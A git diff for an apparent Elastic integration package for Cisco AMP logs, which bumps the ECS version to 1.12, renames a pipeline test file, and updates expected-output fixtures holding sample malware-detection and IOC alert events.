diff --git a/packages/cisco_amp/_dev/build/build.yml b/packages/cisco_amp/_dev/build/build.yml index a138b554aa0..08d85edcf9a 100644 --- a/packages/cisco_amp/_dev/build/build.yml +++ b/packages/cisco_amp/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@1.11 + reference: git@1.12 diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json similarity index 97% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json index 3ef7fced190..a2729963432 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json @@ -12,7 +12,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -38,7 +38,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701333474Z", + "ingested": "2021-09-13T18:06:29.783713069Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -86,7 +86,7 @@ { "@timestamp": "2021-01-14T10:15:29.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -104,7 +104,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:35.701337792Z", + "ingested": "2021-09-13T18:06:29.783719163Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6533243623469744000", "kind": "alert" @@ -159,7 +159,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -191,7 +191,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701339869Z", + "ingested": "2021-09-13T18:06:29.783721500Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -248,7 +248,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -268,7 +268,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701341785Z", + "ingested": "2021-09-13T18:06:29.783723655Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -319,7 +319,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -339,7 +339,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701343742Z", + "ingested": "2021-09-13T18:06:29.783725794Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -407,7 +407,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -439,7 +439,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701345707Z", + "ingested": "2021-09-13T18:06:29.783727990Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -507,7 +507,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -537,7 +537,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701347645Z", + "ingested": "2021-09-13T18:06:29.783730076Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -594,7 +594,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -614,7 +614,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701349558Z", + "ingested": "2021-09-13T18:06:29.783732206Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -672,7 +672,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -692,7 +692,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701351457Z", + "ingested": "2021-09-13T18:06:29.783734294Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -758,7 +758,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -778,7 +778,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701353384Z", + "ingested": "2021-09-13T18:06:29.783736424Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -844,7 +844,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -864,7 +864,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701355274Z", + "ingested": "2021-09-13T18:06:29.783738503Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -930,7 +930,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -950,7 +950,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701357412Z", + "ingested": "2021-09-13T18:06:29.783740861Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "kind": "alert", "start": "2021-01-14T10:04:56.000Z", @@ -1016,7 +1016,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1036,7 +1036,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:32:35.701359314Z", + "ingested": "2021-09-13T18:06:29.783742934Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}", "kind": "alert", "start": "2021-01-14T10:04:49.000Z", @@ -1102,7 +1102,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1122,7 +1122,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701361216Z", + "ingested": "2021-09-13T18:06:29.783745003Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud 